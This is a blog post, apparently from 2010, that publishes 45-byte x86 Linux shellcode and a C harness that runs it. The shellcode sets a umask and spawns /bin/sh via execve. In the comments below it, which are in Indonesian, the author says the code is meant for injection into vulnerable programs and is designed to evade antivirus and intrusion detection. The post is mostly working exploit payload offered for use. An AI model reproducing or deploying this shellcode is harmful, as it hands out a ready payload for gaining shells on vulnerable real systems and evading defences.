break a time, with break the c0de…

45 bytes sys_execve(“/bin/sh”, “0”, “0”) with umask 16 (sys_umask(14)) x86 linux shellcode


/*
Name   : 45 bytes sys_execve("/bin/sh", "0", "0") with umask 16 (sys_umask(14)) x86 linux shellcode
Date   : may, 31 2010
Author : gunslinger_
Web    : devilzc0de.com
blog   : gunslinger.devilzc0de.com
tested on : linux debian
*/

int main(){
	char shell[] =  "\x31\xc0\x31\xdb\x31\xdb\x31\xd2\x31"
			"\xc9\xb0\x3c\x31\xdb\xb3\x0e\xcd\x80"
			"\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2"
			"\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff"
			"\x2f\x62\x69\x6e\x2f\x73\x68";

	(*(void (*)()) shell)();
}
Advertisements

4 responses

  1. culun

    itu shellcode ga bisa pake yang lain ya? harus dibuat fungsi dr char…semua opcode itu juga bisa kalau udah dikondisikan untuk root dan kondisi /proc/sys/kernel/exec-shield harus 0,
    {
    fprintf(stdout,”Length: %d\n”,strlen(shellcode));
    ((void (*)(void)) shellcode)();
    return 0;
    }

    salam

    June 6, 2010 at 8:33 am

    • kalo seperti itu mungkin akan mudah di deteksi sama AV atau IDS bro, tekhnik shellcode yang ane pake kali ini dengan strategi undetectable . karena shellcode tidak seperti virus , kalo virus kita harus memikirkan bagaimana caranya agar tetap bertahan setelah infeksi, tapi kalo shellcode kita ga selamatkan itu. yg kita fikirkan adalah bagaimana shellcode tereksekusi, tanpa terdeteksi av atau ids. atau bisa disebut tehnik polymorphic yang dah ada pd tahun 1992

      June 6, 2010 at 10:27 pm

  2. culun

    yang dipaste itu kan dari shellcode anda sendiri?? coba hayuu dicek, untuk skrip pada subjek ini
    (*(void (*)()) shell)();

    juga mestinya sama aja, yang anda sebutkan juga termasuk polymorpic, namun shellcode anda masih simpel :). sudah lama juga ga pernah liat blog-blog seperti ini. pemain-pemain lama udah ga pernah keliatan lagi.

    salam

    June 7, 2010 at 1:40 am

    • yah memang dari shellcode saya sendiri dan dan saya buat shellcode sesimple mungkin (short byte)
      dan saya menulis shellcode bukan untuk mengaplikasikannya langsung melainkan untuk menginjeksi program yang vulnerable tanpa terbilang instruksi ilegal ;)

      June 7, 2010 at 2:11 am

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s